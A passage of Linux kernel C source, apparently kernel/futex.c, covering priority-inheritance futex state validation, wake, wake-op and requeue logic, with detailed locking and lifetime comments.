* [7] Found | Found | NULL | Any | 0 | Invalid
*
* [8] Found | Found | task | ==taskTID | 0/1 | Valid
* [9] Found | Found | task | 0 | 0 | Invalid
* [10] Found | Found | task | !=taskTID | 0/1 | Invalid
*
* [1] Indicates that the kernel can acquire the futex atomically. We
* came came here due to a stale FUTEX_WAITERS/FUTEX_OWNER_DIED bit.
*
* [2] Valid, if TID does not belong to a kernel thread. If no matching
* thread is found then it indicates that the owner TID has died.
*
* [3] Invalid. The waiter is queued on a non PI futex
*
* [4] Valid state after exit_robust_list(), which sets the user space
* value to FUTEX_WAITERS | FUTEX_OWNER_DIED.
*
* [5] The user space value got manipulated between exit_robust_list()
* and exit_pi_state_list()
*
* [6] Valid state after exit_pi_state_list() which sets the new owner in
* the pi_state but cannot access the user space value.
*
* [7] pi_state->owner can only be NULL when the OWNER_DIED bit is set.
*
* [8] Owner and user space value match
*
* [9] There is no transient state which sets the user space TID to 0
* except exit_robust_list(), but this is indicated by the
* FUTEX_OWNER_DIED bit. See [4]
*
* [10] There is no transient state which leaves owner and user space
* TID out of sync.
*
*
* Serialization and lifetime rules:
*
* hb->lock:
*
* hb -> futex_q, relation
* futex_q -> pi_state, relation
*
* (cannot be raw because hb can contain arbitrary amount
* of futex_q's)
*
* pi_mutex->wait_lock:
*
* {uval, pi_state}
*
* (and pi_mutex 'obviously')
*
* p->pi_lock:
*
* p->pi_state_list -> pi_state->list, relation
*
* pi_state->refcount:
*
* pi_state lifetime
*
*
* Lock order:
*
* hb->lock
* pi_mutex->wait_lock
* p->pi_lock
*
*/
/*
* Validate that the existing waiter has a pi_state and sanity check
* the pi_state against the user space value. If correct, attach to
* it.
*/
static int attach_to_pi_state(u32 __user *uaddr, u32 uval,
struct futex_pi_state *pi_state,
struct futex_pi_state **ps)
{
pid_t pid = uval & FUTEX_TID_MASK;
u32 uval2;
int ret;
/*
* Userspace might have messed up non-PI and PI futexes [3]
*/
if (unlikely(!pi_state))
return -EINVAL;
/*
* We get here with hb->lock held, and having found a
* futex_top_waiter(). This means that futex_lock_pi() of said futex_q
* has dropped the hb->lock in between queue_me() and unqueue_me_pi(),
* which in turn means that futex_lock_pi() still has a reference on
* our pi_state.
*
* The waiter holding a reference on @pi_state also protects against
* the unlocked put_pi_state() in futex_unlock_pi(), futex_lock_pi()
* and futex_wait_requeue_pi() as it cannot go to 0 and consequently
* free pi_state before we can take a reference ourselves.
*/
WARN_ON(!atomic_read(&pi_state->refcount));
/*
* Now that we have a pi_state, we can acquire wait_lock
* and do the state validation.
*/
raw_spin_lock_irq(&pi_state->pi_mutex.wait_lock);
/*
* Since {uval, pi_state} is serialized by wait_lock, and our current
* uval was read without holding it, it can have changed. Verify it
* still is what we expect it to be, otherwise retry the entire
* operation.
*/
if (get_futex_value_locked(&uval2, uaddr))
goto out_efault;
if (uval != uval2)
goto out_eagain;
/*
* Handle the owner died case:
*/
if (uval & FUTEX_OWNER_DIED) {
/*
* exit_pi_state_list sets owner to NULL and wakes the
* topmost waiter. The task which acquires the
* pi_state->rt_mutex will fixup owner.
*/
if (!pi_state->owner) {
/*
* No pi state owner, but the user space TID
* is not 0. Inconsistent state. [5]
*/
if (pid)
goto out_einval;
/*
* Take a ref on the state and return success. [4]
*/
goto out_attach;
}
/*
* If TID is 0, then either the dying owner has not
* yet executed exit_pi_state_list() or some waiter
* acquired the rtmutex in the pi state, but did not
* yet fixup the TID in user space.
*
* Take a ref on the state and return success. [6]
*/
if (!pid)
goto out_attach;
} else {
/*
* If the owner died bit is not set, then the pi_state
* must have an owner. [7]
*/
if (!pi_state->owner)
goto out_einval;
}
/*
* Bail out if user space manipulated the futex value. If pi
* state exists then the owner TID must be the same as the
* user space TID. [9/10]
*/
if (pid != task_pid_vnr(pi_state->owner))
goto out_einval;
out_attach:
get_pi_state(pi_state);
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
*ps = pi_state;
return 0;
out_einval:
ret = -EINVAL;
goto out_error;
out_eagain:
ret = -EAGAIN;
goto out_error;
out_efault:
ret = -EFAULT;
goto out_error;
out_error:
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
return ret;
}
/*
* Lookup the task for the TID provided from user space and attach to
* it after doing proper sanity checks.
*/
static int attach_to_pi_owner(u32 uval, union futex_key *key,
struct futex_pi_state **ps)
{
pid_t pid = uval & FUTEX_TID_MASK;
struct futex_pi_state *pi_state;
struct task_struct *p;
/*
* We are the first waiter - try to look up the real owner and attach
* the new pi_state to it, but bail out when TID = 0 [1]
*/
if (!pid)
return -ESRCH;
p = futex_find_get_task(pid);
if (!p)
return -ESRCH;
if (unlikely(p->flags & PF_KTHREAD)) {
put_task_struct(p);
return -EPERM;
}
/*
* We need to look at the task state flags to figure out,
* whether the task is exiting. To protect against the do_exit
* change of the task flags, we do this protected by
* p->pi_lock:
*/
raw_spin_lock_irq(&p->pi_lock);
if (unlikely(p->flags & PF_EXITING)) {
/*
* The task is on the way out. When PF_EXITPIDONE is
* set, we know that the task has finished the
* cleanup:
*/
int ret = (p->flags & PF_EXITPIDONE) ? -ESRCH : -EAGAIN;
raw_spin_unlock_irq(&p->pi_lock);
put_task_struct(p);
return ret;
}
/*
* No existing pi state. First waiter. [2]
*
* This creates pi_state, we have hb->lock held, this means nothing can
* observe this state, wait_lock is irrelevant.
*/
pi_state = alloc_pi_state();
/*
* Initialize the pi_mutex in locked state and make @p
* the owner of it:
*/
rt_mutex_init_proxy_locked(&pi_state->pi_mutex, p);
/* Store the key for possible exit cleanups: */
pi_state->key = *key;
WARN_ON(!list_empty(&pi_state->list));
list_add(&pi_state->list, &p->pi_state_list);
/*
* Assignment without holding pi_state->pi_mutex.wait_lock is safe
* because there is no concurrency as the object is not published yet.
*/
pi_state->owner = p;
raw_spin_unlock_irq(&p->pi_lock);
put_task_struct(p);
*ps = pi_state;
return 0;
}
static int lookup_pi_state(u32 __user *uaddr, u32 uval,
struct futex_hash_bucket *hb,
union futex_key *key, struct futex_pi_state **ps)
{
struct futex_q *top_waiter = futex_top_waiter(hb, key);
/*
* If there is a waiter on that futex, validate it and
* attach to the pi_state when the validation succeeds.
*/
if (top_waiter)
return attach_to_pi_state(uaddr, uval, top_waiter->pi_state, ps);
/*
* We are the first waiter - try to look up the owner based on
* @uval and attach to it.
*/
return attach_to_pi_owner(uval, key, ps);
}
static int lock_pi_update_atomic(u32 __user *uaddr, u32 uval, u32 newval)
{
u32 uninitialized_var(curval);
if (unlikely(should_fail_futex(true)))
return -EFAULT;
if (unlikely(cmpxchg_futex_value_locked(&curval, uaddr, uval, newval)))
return -EFAULT;
/* If user space value changed, let the caller retry */
return curval != uval ? -EAGAIN : 0;
}
/**
* futex_lock_pi_atomic() - Atomic work required to acquire a pi aware futex
* @uaddr: the pi futex user address
* @hb: the pi futex hash bucket
* @key: the futex key associated with uaddr and hb
* @ps: the pi_state pointer where we store the result of the
* lookup
* @task: the task to perform the atomic lock work for. This will
* be "current" except in the case of requeue pi.
* @set_waiters: force setting the FUTEX_WAITERS bit (1) or not (0)
*
* Return:
* - 0 - ready to wait;
* - 1 - acquired the lock;
* - <0 - error
*
* The hb->lock and futex_key refs shall be held by the caller.
*/
static int futex_lock_pi_atomic(u32 __user *uaddr, struct futex_hash_bucket *hb,
union futex_key *key,
struct futex_pi_state **ps,
struct task_struct *task, int set_waiters)
{
u32 uval, newval, vpid = task_pid_vnr(task);
struct futex_q *top_waiter;
int ret;
/*
* Read the user space value first so we can validate a few
* things before proceeding further.
*/
if (get_futex_value_locked(&uval, uaddr))
return -EFAULT;
if (unlikely(should_fail_futex(true)))
return -EFAULT;
/*
* Detect deadlocks.
*/
if ((unlikely((uval & FUTEX_TID_MASK) == vpid)))
return -EDEADLK;
if ((unlikely(should_fail_futex(true))))
return -EDEADLK;
/*
* Lookup existing state first. If it exists, try to attach to
* its pi_state.
*/
top_waiter = futex_top_waiter(hb, key);
if (top_waiter)
return attach_to_pi_state(uaddr, uval, top_waiter->pi_state, ps);
/*
* No waiter and user TID is 0. We are here because the
* waiters or the owner died bit is set or called from
* requeue_cmp_pi or for whatever reason something took the
* syscall.
*/
if (!(uval & FUTEX_TID_MASK)) {
/*
* We take over the futex. No other waiters and the user space
* TID is 0. We preserve the owner died bit.
*/
newval = uval & FUTEX_OWNER_DIED;
newval |= vpid;
/* The futex requeue_pi code can enforce the waiters bit */
if (set_waiters)
newval |= FUTEX_WAITERS;
ret = lock_pi_update_atomic(uaddr, uval, newval);
/* If the take over worked, return 1 */
return ret < 0 ? ret : 1;
}
/*
* First waiter. Set the waiters bit before attaching ourself to
* the owner. If owner tries to unlock, it will be forced into
* the kernel and blocked on hb->lock.
*/
newval = uval | FUTEX_WAITERS;
ret = lock_pi_update_atomic(uaddr, uval, newval);
if (ret)
return ret;
/*
* If the update of the user space value succeeded, we try to
* attach to the owner. If that fails, no harm done, we only
* set the FUTEX_WAITERS bit in the user space variable.
*/
return attach_to_pi_owner(uval, key, ps);
}
/**
* __unqueue_futex() - Remove the futex_q from its futex_hash_bucket
* @q: The futex_q to unqueue
*
* The q->lock_ptr must not be NULL and must be held by the caller.
*/
static void __unqueue_futex(struct futex_q *q)
{
struct futex_hash_bucket *hb;
if (WARN_ON_SMP(!q->lock_ptr || !spin_is_locked(q->lock_ptr))
|| WARN_ON(plist_node_empty(&q->list)))
return;
hb = container_of(q->lock_ptr, struct futex_hash_bucket, lock);
plist_del(&q->list, &hb->chain);
hb_waiters_dec(hb);
}
/*
* The hash bucket lock must be held when this is called.
* Afterwards, the futex_q must not be accessed. Callers
* must ensure to later call wake_up_q() for the actual
* wakeups to occur.
*/
static void mark_wake_futex(struct wake_q_head *wake_q, struct futex_q *q)
{
struct task_struct *p = q->task;
if (WARN(q->pi_state || q->rt_waiter, "refusing to wake PI futex\n"))
return;
/*
* Queue the task for later wakeup for after we've released
* the hb->lock. wake_q_add() grabs reference to p.
*/
wake_q_add(wake_q, p);
__unqueue_futex(q);
/*
* The waiting task can free the futex_q as soon as q->lock_ptr = NULL
* is written, without taking any locks. This is possible in the event
* of a spurious wakeup, for example. A memory barrier is required here
* to prevent the following store to lock_ptr from getting ahead of the
* plist_del in __unqueue_futex().
*/
smp_store_release(&q->lock_ptr, NULL);
}
/*
* Caller must hold a reference on @pi_state.
*/
static int wake_futex_pi(u32 __user *uaddr, u32 uval, struct futex_pi_state *pi_state)
{
u32 uninitialized_var(curval), newval;
struct task_struct *new_owner;
bool postunlock = false;
DEFINE_WAKE_Q(wake_q);
int ret = 0;
new_owner = rt_mutex_next_owner(&pi_state->pi_mutex);
if (WARN_ON_ONCE(!new_owner)) {
/*
* As per the comment in futex_unlock_pi() this should not happen.
*
* When this happens, give up our locks and try again, giving
* the futex_lock_pi() instance time to complete, either by
* waiting on the rtmutex or removing itself from the futex
* queue.
*/
ret = -EAGAIN;
goto out_unlock;
}
/*
* We pass it to the next owner. The WAITERS bit is always kept
* enabled while there is PI state around. We cleanup the owner
* died bit, because we are the owner.
*/
newval = FUTEX_WAITERS | task_pid_vnr(new_owner);
if (unlikely(should_fail_futex(true)))
ret = -EFAULT;
if (cmpxchg_futex_value_locked(&curval, uaddr, uval, newval)) {
ret = -EFAULT;
} else if (curval != uval) {
/*
* If a unconditional UNLOCK_PI operation (user space did not
* try the TID->0 transition) raced with a waiter setting the
* FUTEX_WAITERS flag between get_user() and locking the hash
* bucket lock, retry the operation.
*/
if ((FUTEX_TID_MASK & curval) == uval)
ret = -EAGAIN;
else
ret = -EINVAL;
}
if (ret)
goto out_unlock;
/*
* This is a point of no return; once we modify the uval there is no
* going back and subsequent operations must not fail.
*/
raw_spin_lock(&pi_state->owner->pi_lock);
WARN_ON(list_empty(&pi_state->list));
list_del_init(&pi_state->list);
raw_spin_unlock(&pi_state->owner->pi_lock);
raw_spin_lock(&new_owner->pi_lock);
WARN_ON(!list_empty(&pi_state->list));
list_add(&pi_state->list, &new_owner->pi_state_list);
pi_state->owner = new_owner;
raw_spin_unlock(&new_owner->pi_lock);
postunlock = __rt_mutex_futex_unlock(&pi_state->pi_mutex, &wake_q);
out_unlock:
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
if (postunlock)
rt_mutex_postunlock(&wake_q);
return ret;
}
/*
* Express the locking dependencies for lockdep:
*/
static inline void
double_lock_hb(struct futex_hash_bucket *hb1, struct futex_hash_bucket *hb2)
{
if (hb1 <= hb2) {
spin_lock(&hb1->lock);
if (hb1 < hb2)
spin_lock_nested(&hb2->lock, SINGLE_DEPTH_NESTING);
} else { /* hb1 > hb2 */
spin_lock(&hb2->lock);
spin_lock_nested(&hb1->lock, SINGLE_DEPTH_NESTING);
}
}
static inline void
double_unlock_hb(struct futex_hash_bucket *hb1, struct futex_hash_bucket *hb2)
{
spin_unlock(&hb1->lock);
if (hb1 != hb2)
spin_unlock(&hb2->lock);
}
/*
* Wake up waiters matching bitset queued on this futex (uaddr).
*/
static int
futex_wake(u32 __user *uaddr, unsigned int flags, int nr_wake, u32 bitset)
{
struct futex_hash_bucket *hb;
struct futex_q *this, *next;
union futex_key key = FUTEX_KEY_INIT;
int ret;
DEFINE_WAKE_Q(wake_q);
if (!bitset)
return -EINVAL;
ret = get_futex_key(uaddr, flags & FLAGS_SHARED, &key, VERIFY_READ);
if (unlikely(ret != 0))
goto out;
hb = hash_futex(&key);
/* Make sure we really have tasks to wakeup */
if (!hb_waiters_pending(hb))
goto out_put_key;
spin_lock(&hb->lock);
plist_for_each_entry_safe(this, next, &hb->chain, list) {
if (match_futex (&this->key, &key)) {
if (this->pi_state || this->rt_waiter) {
ret = -EINVAL;
break;
}
/* Check if one of the bits is set in both bitsets */
if (!(this->bitset & bitset))
continue;
mark_wake_futex(&wake_q, this);
if (++ret >= nr_wake)
break;
}
}
spin_unlock(&hb->lock);
wake_up_q(&wake_q);
out_put_key:
put_futex_key(&key);
out:
return ret;
}
static int futex_atomic_op_inuser(unsigned int encoded_op, u32 __user *uaddr)
{
unsigned int op = (encoded_op & 0x70000000) >> 28;
unsigned int cmp = (encoded_op & 0x0f000000) >> 24;
int oparg = sign_extend32((encoded_op & 0x00fff000) >> 12, 11);
int cmparg = sign_extend32(encoded_op & 0x00000fff, 11);
int oldval, ret;
if (encoded_op & (FUTEX_OP_OPARG_SHIFT << 28)) {
if (oparg < 0 || oparg > 31) {
char comm[sizeof(current->comm)];
/*
* kill this print and return -EINVAL when userspace
* is sane again
*/
pr_info_ratelimited("futex_wake_op: %s tries to shift op by %d; fix this program\n",
get_task_comm(comm, current), oparg);
oparg &= 31;
}
oparg = 1 << oparg;
}
if (!access_ok(VERIFY_WRITE, uaddr, sizeof(u32)))
return -EFAULT;
ret = arch_futex_atomic_op_inuser(op, oparg, &oldval, uaddr);
if (ret)
return ret;
switch (cmp) {
case FUTEX_OP_CMP_EQ:
return oldval == cmparg;
case FUTEX_OP_CMP_NE:
return oldval != cmparg;
case FUTEX_OP_CMP_LT:
return oldval < cmparg;
case FUTEX_OP_CMP_GE:
return oldval >= cmparg;
case FUTEX_OP_CMP_LE:
return oldval <= cmparg;
case FUTEX_OP_CMP_GT:
return oldval > cmparg;
default:
return -ENOSYS;
}
}
/*
* Wake up all waiters hashed on the physical page that is mapped
* to this virtual address:
*/
static int
futex_wake_op(u32 __user *uaddr1, unsigned int flags, u32 __user *uaddr2,
int nr_wake, int nr_wake2, int op)
{
union futex_key key1 = FUTEX_KEY_INIT, key2 = FUTEX_KEY_INIT;
struct futex_hash_bucket *hb1, *hb2;
struct futex_q *this, *next;
int ret, op_ret;
DEFINE_WAKE_Q(wake_q);
retry:
ret = get_futex_key(uaddr1, flags & FLAGS_SHARED, &key1, VERIFY_READ);
if (unlikely(ret != 0))
goto out;
ret = get_futex_key(uaddr2, flags & FLAGS_SHARED, &key2, VERIFY_WRITE);
if (unlikely(ret != 0))
goto out_put_key1;
hb1 = hash_futex(&key1);
hb2 = hash_futex(&key2);
retry_private:
double_lock_hb(hb1, hb2);
op_ret = futex_atomic_op_inuser(op, uaddr2);
if (unlikely(op_ret < 0)) {
double_unlock_hb(hb1, hb2);
#ifndef CONFIG_MMU
/*
* we don't get EFAULT from MMU faults if we don't have an MMU,
* but we might get them from range checking
*/
ret = op_ret;
goto out_put_keys;
#endif
if (unlikely(op_ret != -EFAULT)) {
ret = op_ret;
goto out_put_keys;
}
ret = fault_in_user_writeable(uaddr2);
if (ret)
goto out_put_keys;
if (!(flags & FLAGS_SHARED))
goto retry_private;
put_futex_key(&key2);
put_futex_key(&key1);
goto retry;
}
plist_for_each_entry_safe(this, next, &hb1->chain, list) {
if (match_futex (&this->key, &key1)) {
if (this->pi_state || this->rt_waiter) {
ret = -EINVAL;
goto out_unlock;
}
mark_wake_futex(&wake_q, this);
if (++ret >= nr_wake)
break;
}
}
if (op_ret > 0) {
op_ret = 0;
plist_for_each_entry_safe(this, next, &hb2->chain, list) {
if (match_futex (&this->key, &key2)) {
if (this->pi_state || this->rt_waiter) {
ret = -EINVAL;
goto out_unlock;
}
mark_wake_futex(&wake_q, this);
if (++op_ret >= nr_wake2)
break;
}
}
ret += op_ret;
}
out_unlock:
double_unlock_hb(hb1, hb2);
wake_up_q(&wake_q);
out_put_keys:
put_futex_key(&key2);
out_put_key1:
put_futex_key(&key1);
out:
return ret;
}
/**
* requeue_futex() - Requeue a futex_q from one hb to another
* @q: the futex_q to requeue
* @hb1: the source hash_bucket
* @hb2: the target hash_bucket
* @key2: the new key for the requeued futex_q
*/
static inline
void requeue_futex(struct futex_q *q, struct futex_hash_bucket *hb1,
struct futex_hash_bucket *hb2, union futex_key *key2)
{
/*
* If key1 and key2 hash to the same bucket, no need to
* requeue.
*/
if (likely(&hb1->chain != &hb2->chain)) {
plist_del(&q->list, &hb1->chain);
hb_waiters_dec(hb1);
hb_waiters_inc(hb2);
plist_add(&q->list, &hb2->chain);
q->lock_ptr = &hb2->lock;
}
get_futex_key_refs(key2);
q->key = *key2;
}
/**
* requeue_pi_wake_futex() - Wake a task that acquired the lock during requeue
* @q: the futex_q
* @key: the key of the requeue target futex
* @hb: the hash_bucket of the requeue target futex
*
* During futex_requeue, with requeue_pi=1, it is possible to acquire the
* target futex if it is uncontended or via a lock steal. Set the futex_q key
* to the requeue target futex so the waiter can detect the wakeup on the right
* futex, but remove it from the hb and NULL the rt_waiter so it can detect
* atomic lock acquisition. Set the q->lock_ptr to the requeue target hb->lock
* to protect access to the pi_state to fixup the owner later. Must be called
* with both q->lock_ptr and hb->lock held.
*/
static inline
void requeue_pi_wake_futex(struct futex_q *q, union futex_key *key,
struct futex_hash_bucket *hb)
{
get_futex_key_refs(key);
q->key = *key;
__unqueue_futex(q);
WARN_ON(!q->rt_waiter);
q->rt_waiter = NULL;
q->lock_ptr = &hb->lock;
wake_up_state(q->task, TASK_NORMAL);
}
/**
* futex_proxy_trylock_atomic() - Attempt an atomic lock for the top waiter
* @pifutex: the user address of the to futex
* @hb1: the from futex hash bucket, must be locked by the caller
* @hb2: the to futex hash bucket, must be locked by the caller
* @key1: the from futex key
* @key2: the to futex key
* @ps: address to store the pi_state pointer
* @set_waiters: force setting the FUTEX_WAITERS bit (1) or not (0)
*
* Try and get the lock on behalf of the top waiter if we can do it atomically.
* Wake the top waiter if we succeed. If the caller specified set_waiters,
* then direct futex_lock_pi_atomic() to force setting the FUTEX_WAITERS bit.
* hb1 and hb2 must be held by the caller.
*
* Return:
* - 0 - failed to acquire the lock atomically;
* - >0 - acquired the lock, return value is vpid of the top_waiter
* - <0 - error
*/
static int futex_proxy_trylock_atomic(u32 __user *pifutex,
struct futex_hash_bucket *hb1,
struct futex_hash_bucket *hb2,
union futex_key *key1, union futex_key *key2,
struct futex_pi_state **ps, int set_waiters)
{
struct futex_q *top_waiter = NULL;
u32 curval;
int ret, vpid;
if (get_futex_value_locked(&curval, pifutex))
return -EFAULT;
if (unlikely(should_fail_futex(true)))
return -EFAULT;
/*
* Find the top_waiter and determine if there are additional waiters.
* If the caller intends to requeue more than 1 waiter to pifutex,
* force futex_lock_pi_atomic() to set the FUTEX_WAITERS bit now,
* as we have means to handle the possible fault. If not, don't set
* the bit unecessarily as it will force the subsequent unlock to enter
* the kernel.
*/
top_waiter = futex_top_waiter(hb1, key1);
/* There are no waiters, nothing for us to do. */
if (!top_waiter)
return 0;
/* Ensure we requeue to the expected futex. */
if (!match_futex(top_waiter->requeue_pi_key, key2))
return -EINVAL;
/*
* Try to take the lock for top_waiter. Set the FUTEX_WAITERS bit in
* the contended case or if set_waiters is 1. The pi_state is returned
* in ps in contended cases.
*/
vpid = task_pid_vnr(top_waiter->task);
ret = futex_lock_pi_atomic(pifutex, hb2, key2, ps, top_waiter->task,
set_waiters);
if (ret == 1) {
requeue_pi_wake_futex(top_waiter, key2, hb2);
return vpid;
}
return ret;
}
/**
* futex_requeue() - Requeue waiters from uaddr1 to uaddr2
* @uaddr1: source futex user address
* @flags: futex flags (FLAGS_SHARED, etc.)
* @uaddr2: target futex user address
* @nr_wake: number of waiters to wake (must be 1 for requeue_pi)
* @nr_requeue: number of waiters to requeue (0-INT_MAX)
* @cmpval: @uaddr1 expected value (or %NULL)
* @requeue_pi: if we are attempting to requeue from a non-pi futex to a
* pi futex (pi to pi requeue is not supported)
*
* Requeue waiters on uaddr1 to uaddr2. In the requeue_pi case, try to acquire
* uaddr2 atomically on behalf of the top waiter.
*
* Return:
* - >=0 - on success, the number of tasks requeued or woken;
* - <0 - on error
*/
static int futex_requeue(u32 __user *uaddr1, unsigned int flags,
u32 __user *uaddr2, int nr_wake, int nr_requeue,
u32 *cmpval, int requeue_pi)
{
union futex_key key1 = FUTEX_KEY_INIT, key2 = FUTEX_KEY_INIT;
int drop_count = 0, task_count = 0, ret;
struct futex_pi_state *pi_state = NULL;
struct futex_hash_bucket *hb1, *hb2;
struct futex_q *this, *next;
DEFINE_WAKE_Q(wake_q);
if (nr_wake < 0 || nr_requeue < 0)
return -EINVAL;
/*
* When PI not supported: return -ENOSYS if requeue_pi is true,
* consequently the compiler knows requeue_pi is always false past
* this point which will optimize away all the conditional code
* further down.
*/
if (!IS_ENABLED(CONFIG_FUTEX_PI) && requeue_pi)
return -ENOSYS;
if (requeue_pi) {
/*
* Requeue PI only works on two distinct uaddrs. This
* check is only valid for private futexes. See below.
*/
if (uaddr1 == uaddr2)
return -EINVAL;
/*
* requeue_pi requires a pi_state, try to allocate it now
* without any locks in case it fails.
*/
if (refill_pi_state_cache())
return -ENOMEM;
/*
* requeue_pi must wake as many tasks as it can, up to nr_wake
* + nr_requeue, since it acquires the rt_mutex prior to
* returning to userspace, so as to not leave the rt_mutex with
* waiters and no owner. However, second and third wake-ups
* cannot be predicted as they involve race conditions with the
* first wake and a fault while looking up the pi_state. Both
* pthread_cond_signal() and pthread_cond_broadcast() should
* use nr_wake=1.
*/
if (nr_wake != 1)
return -EINVAL;
}
retry:
ret = get_futex_key(uaddr1, flags & FLAGS_SHARED, &key1, VERIFY_READ);
if (unlikely(ret != 0))
goto out;
ret = get_futex_key(uaddr2, flags & FLAGS_SHARED, &key2,
requeue_pi ? VERIFY_WRITE : VERIFY_READ);
if (unlikely(ret != 0))
goto out_put_key1;
/*
* The check above which compares uaddrs is not sufficient for
* shared futexes. We need to compare the keys:
*/
if (requeue_pi && match_futex(&key1, &key2)) {
ret = -EINVAL;
goto out_put_keys;
}
hb1 = hash_futex(&key1);
hb2 = hash_futex(&key2);
retry_private:
hb_waiters_inc(hb2);
double_lock_hb(hb1, hb2);
if (likely(cmpval != NULL)) {
u32 curval;
ret = get_futex_value_locked(&curval, uaddr1);
if (unlikely(ret)) {
double_unlock_hb(hb1, hb2);
hb_waiters_dec(hb2);
ret = get_user(curval, uaddr1);
if (ret)
goto out_put_keys;
if (!(flags & FLAGS_SHARED))
goto retry_private;
put_futex_key(&key2);
put_futex_key(&key1);
goto retry;
}
if (curval != *cmpval) {
ret = -EAGAIN;
goto out_unlock;
}
}
if (requeue_pi && (task_count - nr_wake < nr_requeue)) {
/*
* Attempt to acquire uaddr2 and wake the top waiter. If we
* intend to requeue waiters, force setting the FUTEX_WAITERS
* bit. We force this here where we are able to easily handle
* faults rather in the requeue loop below.
*/
ret = futex_proxy_trylock_atomic(uaddr2, hb1, hb2, &key1,
&key2, &pi_state, nr_requeue);
/*
* At this point the top_waiter has either taken uaddr2 or is
* waiting on it. If the former, then the pi_state will not
* exist yet, look it up one more time to ensure we have a
* reference to it. If the lock was taken, ret contains the
* vpid of the top waiter task.
* If the lock was not taken, we have pi_state and an initial
* refcount on it. In case of an error we have nothing.
*/
if (ret > 0) {
WARN_ON(pi_state);
drop_count++;
task_count++;
/*
* If we acquired the lock, then the user space value
* of uaddr2 should be vpid. It cannot be changed by
* the top waiter as it is blocked on hb2 lock if it
* tries to do so. If something fiddled with it behind
* our back the pi state lookup might unearth it. So
* we rather use the known value than rereading and
* handing potential crap to lookup_pi_state.
*
* If that call succeeds then we have pi_state and an
* initial refcount on it.
*/
ret = lookup_pi_state(uaddr2, ret, hb2, &key2, &pi_state);
}
switch (ret) {
case 0:
/* We hold a reference on the pi state. */
break;
/* If the above failed, then pi_state is NULL */
case -EFAULT:
double_unlock_hb(hb1, hb2);
hb_waiters_dec(hb2);
put_futex_key(&key2);
put_futex_key(&key1);
ret = fault_in_user_writeable(uaddr2);
if (!ret)
goto retry;
goto out;
case -EAGAIN:
/*
* Two reasons for this:
* - Owner is exiting and we just wait for the
* exit to complete.
* - The user space value changed.
*/
double_unlock_hb(hb1, hb2);
hb_waiters_dec(hb2);
put_futex_key(&key2);
put_futex_key(&key1);
cond_resched();
goto retry;
default:
goto out_unlock;
}
}
plist_for_each_entry_safe(this, next, &hb1->chain, list) {
if (task_count - nr_wake >= nr_requeue)
break;
if (!match_futex(&this->key, &key1))
continue;
/*
* FUTEX_WAIT_REQEUE_PI and FUTEX_CMP_REQUEUE_PI should always
* be paired with each other and no other futex ops.
*
* We should never be requeueing a futex_q with a pi_state,
* which is awaiting a futex_unlock_pi().
*/
if ((requeue_pi && !this->rt_waiter) ||
(!requeue_pi && this->rt_waiter) ||
this->pi_state) {
ret = -EINVAL;
break;
}
/*
* Wake nr_wake waiters. For requeue_pi, if we acquired the
* lock, we already woke the top_waiter. If not, it will be
* woken by futex_unlock_pi().
*/
if (++task_count <= nr_wake && !requeue_pi) {
mark_wake_futex(&wake_q, this);
continue;
}
/* Ensure we requeue to the expected futex for requeue_pi. */
if (requeue_pi && !match_futex(this->requeue_pi_key, &key2)) {
ret = -EINVAL;
break;
}
/*
* Requeue nr_requeue waiters and possibly one more in the case
* of requeue_pi if we couldn't acquire the lock atomically.
*/
if (requeue_pi) {
/*
* Prepare the waiter to take the rt_mutex. Take a
* refcount on the pi_state and store the pointer in
* the futex_q object of the waiter.
*/
get_pi_state(pi_state);
this->pi_state = pi_state;
ret = rt_mutex_start_proxy_lock(&pi_state->pi_mutex,
this->rt_waiter,
this->task);
if (ret == 1) {
/*
* We got the lock. We do neither drop the
* refcount on pi_state nor clear
* this->pi_state because the waiter needs the
* pi_state for cleaning up the user space
* value. It will drop the refcount after
* doing so.
*/
requeue_pi_wake_futex(this, &key2, hb2);
drop_count++;
continue;
} else if (ret) {
/*
* rt_mutex_start_proxy_lock() detected a
* potential deadlock when we tried to queue
* that waiter. Drop the pi_state reference
* which we took above and remove the pointer
* to the state from the waiters futex_q
* object.
*/
this->pi_state = NULL;
put_pi_state(pi_state);
/*
* We stop queueing more waiters and let user
* space deal with the mess.
*/
break;
}
}
requeue_futex(this, hb1, hb2, &key2);
drop_count++;
}
/*
* We took an extra initial reference to the pi_state either
* in futex_proxy_trylock_atomic() or in lookup_pi_state(). We
* need to drop it here again.
*/
put_pi_state(pi_state);
out_unlock:
double_unlock_hb(hb1, hb2);
wake_up_q(&wake_q);
hb_waiters_dec(hb2);
/*
* drop_futex_key_refs() must be called outside the spinlocks. During
* the requeue we moved futex_q's from the hash bucket at key1 to the
* one at key2 and updated their key pointer. We no longer need to
* hold the references to key1.
*/
while (--drop_count >= 0)
drop_futex_key_refs(&key1);
out_put_keys:
put_futex_key(&key2);
out_put_key1:
put_futex_key(&key1);
out:
return ret ? ret : task_count;
}
/* The key must be already stored in q->key. */
static inline struct futex_hash_bucket *queue_lock(struct futex_q *q)
__acquires(&hb->lock)
{
struct futex_hash_bucket *hb;
hb = hash_futex(&q->key);
/*
* Increment the counter before taking the lock so that
* a potential waker won't miss a to-be-slept task that is
* waiting for the spinlock. This is safe as all queue_lock()
* users end up calling queue_me(). Similarly, for housekeeping,
* decrement the counter at queue_unlock() when some error has
* occurred and we don't end up adding the task to the list.
*/
hb_waiters_inc(hb);
q->lock_ptr = &hb->lock;
spin_lock(&hb->lock); /* implies smp_mb(); (A) */
return hb;
}
static inline void
queue_unlock(struct futex_hash_bucket *hb)
__releases(&hb->lock)
{
spin_unlock(&hb->lock);
hb_waiters_dec(hb);
}
static inline void __queue_me(struct futex_q *q, struct futex_hash_bucket *hb)
{
int prio;
/*
* The priority used to register this element is
* - either the real thread-priority for the real-time threads
* (i.e. threads with a priority lower than MAX_RT_PRIO)
* - or MAX_RT_PRIO for non-RT threads.
* Thus, all RT-threads are woken first in priority order, and
* the others are woken last, in FIFO order.
*/
prio = min(current->normal_prio, MAX_RT_PRIO);
plist_node_init(&q->list, prio);
plist_add(&q->list, &hb->chain);
q->task = current;
}
/**
* queue_me() - Enqueue the futex_q on the futex_hash_bucket
* @q: The futex_q to enqueue
* @hb: The destination hash bucket
*
* The hb->lock must be held by the caller, and is released here. A call to
* queue_me() is typically paired with exactly one call to unqueue_me(). The
* exceptions involve the PI related operations, which may use unqueue_me_pi()
* or nothing if the unqueue is done as part of the wake process and the unqueue
